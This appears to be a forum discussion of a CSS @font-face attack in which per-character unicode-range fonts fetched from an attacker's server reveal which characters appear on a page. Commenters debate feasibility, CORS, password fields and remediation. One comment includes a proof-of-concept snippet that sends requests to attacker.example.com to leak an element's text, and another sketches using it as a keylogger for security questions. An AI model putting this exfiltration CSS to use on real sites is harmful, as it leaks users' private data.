CSS Based Attack fontface

I don’t see how this would work. When the browser renders an “ff” ligature, it does not do so by converting every “ff” in the input into U+FB00, as such it will never use this font unless the user input actually contains U+FB00 which is unlikely.

I know of one community website that allows users to use custom third-party CSS and that shows a user's email address in the settings page, so I think you could at least leak email addresses through this (you can target a single input with the fake font, and email addresses aren't random, so the caveat of repeated characters not showing isn't that problematic).

This site doesn't allow password unmasking, but if it did that would also make it quite vulnerable on this front.

> considering the browser is not rendering the actual characters for password fields

Unless you've got a 'show password' checkbox (as recommended by Jakob Nielsen - http://www.nngroup.com/articles/stop-password-masking/).

I can't make this work on my side, both Chromium and Firefox block the requests for the font resources from l0.cm (because CORS policy):

    Font from origin 'http://l0.cm' has been blocked from loading by Cross-Origin Resource Sharing policy:
    No 'Access-Control-Allow-Origin' header is present on the requested resource.
    Origin 'http://lepunk.co.uk' is therefore not allowed access.

Except for Edge, which has an "eye" symbol to show password fields content.

idk if that makes edge vulnerable to this on password fields though.

edit : I read below that Edge does not expose the password through this vulnerability.

you could probably combine this with the font-face trick to target different letters

They don't let you use urls. To use images in their custom stylesheet you have to upload it to reddit, then use a special code or something, that gets replaced with the image url.

They're setting custom fonts, but specifying the fonts should only be used for particular characters.

This attack assumes the attacker has some way of getting CSS they wrote onto the target website, via some other exploit.

The attacker then hosts many font files on a webserver they control. Let's call the fonts "a", "b", "c", and so on.

They then inject the CSS to set the font for text on the target page to their custom fonts - but tell it "use font a for all of the 'a' characters" and so on.

By observing which fonts are downloaded from their webserver, they can learn information on which characters are and are not present on the page.

  @font-face {
    font-family: poc;
    src: url(http://attacker.example.com/?A); /* fetched */
    unicode-range: U+0041;
  }

  #sensitive-information {
    font-family: poc;
  }

means "use the font-file 'http://attacker.example.com/?A' to format the text of element '#sensitive-information' but only to format the letter (glyph?) A". Presumably, the browser only bothers sending the request if it needs to, so my server at attacker.example.com can look out for ?A request to determine if the referer contains an element with that text.

As stated, the attack vector will be limited, but this could certainly leak some information if you can get a site to host that CSS.

I'm not really experienced in @font-face, but I think it's specifing a different webfont for single unicode characters (using the range attribute). Chrome will then try to fetch the font from the many URLs, making an HTTP request for every character in the field (say "Hello" will try to fetch ?H, ?e, ?l, ?o) in the order it finds them.

If you're on the other side (ie. the server serving the font) you can rebuild the original string by seeing which requests have been made and in which order.

Haven't tried it, but I doubt it'll try to fetch the same letter twice, so most of the time the string wouldn't be complete (but again, I haven't tried so I don't know for sure).

> Yet another reason to disable custom fonts

https://news.ycombinator.com/item?id=10492028

8^8 << 62^8 - getting the order is pretty trivial after that high jump.

What are the other reasons?

Same as most html injection attacks. I haven't tested as I'm on the way to work, but I will try to craft the attack as follows:

1: discover html attribute vulnerable to this. 2: craft payload as a link, for Dom, reflected or stored. 3: watch them type characters as rules are triggered. (Is this possible to use as a key logger?!)

So that's general, then more specifically As an attacker I would probably trigger a password lock of the target where the user has to enter security questions. Then gather that information. Another reason to hate security questions.

Remediation:

Output encode in the proper context! This most certainly qualifies as the exact reason why your fancy blacklist (or whitelist) filter set is not the proper mitigation for xss. In the above scenario, The attacker is injecting rules as inline css in the context of an html attribute, so then output encode in that context.

Also I need to check if it can bypass the CSP in any way, though I doubt it.

Sorry for the organization or this post, as I mentioned im on the train.

That is because release builds of Firefox does not support unicode-range, it just downloads all the fonts. But for unicode-range to be really supported, it must only download the fonts for ranges used in the page, as this feature is usually used to split huge fonts (like CJK ones) and let the browser only downloads what is really needed.

The short answer is probably not, for the simple reason that CSS and HTML support in email is generally pretty poor. Most webmail clients rely on having to rewrite CSS (for obvious reasons), which means that properties tend to be on a whitelist rather than a blacklist, and I think @font-face is usually not on that list. For many clients, there is also hopefully remote resource load prevention that prevents it from working.